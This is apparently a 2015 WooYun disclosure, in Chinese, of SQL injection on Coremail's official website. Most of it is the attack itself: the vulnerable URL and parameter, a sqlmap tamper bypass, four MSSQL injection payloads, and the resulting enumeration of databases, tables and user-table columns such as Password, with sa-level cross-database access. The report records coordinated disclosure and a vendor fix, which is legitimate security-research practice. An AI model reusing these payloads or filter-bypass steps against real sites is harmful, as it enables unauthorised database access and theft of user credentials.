Coremail官网SQL注入可读全库 | wooyun-2015-0109557| WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0109557

漏洞标题：Coremail官网SQL注入可读全库

相关厂商：Coremail盈世信息科技（北京）有限公司

漏洞作者： NGup

提交时间：2015-04-21 23:40

修复时间：2015-06-08 16:28

公开时间：2015-06-08 16:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-21：细节已通知厂商并且等待厂商处理中
2015-04-24：厂商已经确认，细节仅向厂商公开
2015-05-04：细节向核心白帽子及相关领域专家公开
2015-05-14：细节向普通白帽子公开
2015-05-24：细节向实习白帽子公开
2015-06-08：细节向公众公开

简要描述：

coremail官网存在注入，有防护，可绕过。

详细说明：

漏洞地址：http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412

漏洞证明：

有防护，直接用sqlmap加个tamper=chardoubleencode.py可以跑出来。
这个是sqlmap用的payload：
Place: GET
Parameter: lcid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lcid=412) AND 4972=4972 AND (7728=7728
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: lcid=412) AND 8722=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (8722=8722) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113))) AND (9712=9712
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: lcid=412) UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(107)+CHAR(111)+CHAR(113)+CHAR(107)+CHAR(116)+CHAR(65)+CHAR(115)+CHAR(111)+CHAR(66)+CHAR(77)+CHAR(112)+CHAR(118)+CHAR(77)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: lcid=412) AND 6450=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (8683=8683
---
跑出的基本内容：
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
跑出来的数据库：
available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] ysxx201412197372
当前库自然就是ysxx201412197372，
数据表：
back-end DBMS: Microsoft SQL Server 2005
Database: ysxx201412197372
[93 tables]
+----------------------------+
| Whir_Cmn_Area |
| Whir_Cnt_Attached |
| Whir_Cnt_CreateLog |
| Whir_Cnt_Relation |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectClass |
| Whir_Cnt_SubjectColumn |
| Whir_Cnt_WorkFlowLogs |
| Whir_Dev_Column |
| Whir_Dev_ConfigStrategy |
| Whir_Dev_Field |
| Whir_Dev_FormArea |
| Whir_Dev_FormArea |
| Whir_Dev_FormDate |
| Whir_Dev_FormOption |
| Whir_Dev_FormUpload |
| Whir_Dev_Menu |
| Whir_Dev_Model |
| Whir_Dev_Module |
| Whir_Dev_Plugin |
| Whir_Dev_SubmitForm |
| Whir_Ext_AuditActivity |
| Whir_Ext_Backup |
| Whir_Ext_CollectField |
| Whir_Ext_CollectField |
| Whir_Ext_Gather |
| Whir_Ext_GatherTable |
| Whir_Ext_OperateLog |
| Whir_Ext_SendEmailRecord |
| Whir_Ext_SensitiveWords |
| Whir_Ext_Tools |
| Whir_Ext_Upload |
| Whir_Ext_WorkFlow |
| Whir_Mem_MemberGroup |
| Whir_Mem_MemberGroup |
| Whir_Oa_NewsConfig |
| Whir_Oa_NewsTemp |
| Whir_Plu_AdvertPosition |
| Whir_Plu_AdvertPosition |
| Whir_Plu_SiteMap |
| Whir_Sec_Resources |
| Whir_Sec_RolesInResources |
| Whir_Sec_RolesInResources |
| Whir_Sec_Users |
| Whir_Sit_SiteInfo |
| Whir_U_Category_Bak |
| Whir_U_Category_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Bak |
| Whir_U_Content_Category |
| Whir_U_Download_Bak |
| Whir_U_Download_Bak |
| Whir_U_Download_Category |
| Whir_U_Feedback_Bak |
| Whir_U_Feedback_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Forms_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Bak |
| Whir_U_Jobs_Category |
| Whir_U_Jobs_JobRequest |
| Whir_U_Links_Bak |
| Whir_U_Links_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Bak |
| Whir_U_Magazine_Chapter |
| Whir_U_Magazine_Infor |
| Whir_U_Product_Bak |
| Whir_U_Product_Bak |
| Whir_U_Product_Category |
| Whir_U_SalesNet_Bak |
| Whir_U_SalesNet_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SinglePage_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Bak |
| Whir_U_SubContent_Category |
| Whir_U_SubForms_Bak |
| Whir_U_SubForms_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubPage_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Bak |
| Whir_U_SubProduct_Category |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Answer |
| Whir_U_Survey_Bak |
| Whir_U_Survey_Detail |
| Whir_U_Survey_Question |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Answer |
| Whir_U_Vote_Bak |
| Whir_U_Vote_Detail |
+----------------------------+
下面是表：Whir_Sec_Users
Table: Whir_Sec_Users
[19 columns]
+----------------+
| Column |
+----------------+
| CreateDate |
| CreateUser |
| Email |
| IsDel |
| LastLoginIP |
| LastLoginTime |
| LoginName |
| LoginType |
| Password |
| RealName |
| Remarks |
| RolesId |
| Sort |
| State |
| SystemLanguage |
| SystemSkin |
| UpdateDate |
| UpdateUser |
| UserId |
+----------------+

当前用户sa，可以跨库查询：
Database: ReportServer
[27 tables]
+--------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| ChunkData |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog |
| History |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| ServerParametersInstance |
| SnapshotData |
| Subscriptions |
| UpgradeInfo |
| Users |
| Catalog |
| Keys |
+--------------------------+
可以拖库。。。。-_-
我没拖，
没拖，
拖....

修复方案：

过滤。

版权声明：转载请注明来源 NGup@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-04-24 16:27

厂商回复：

已获知，并已完成修复

最新状态：

暂无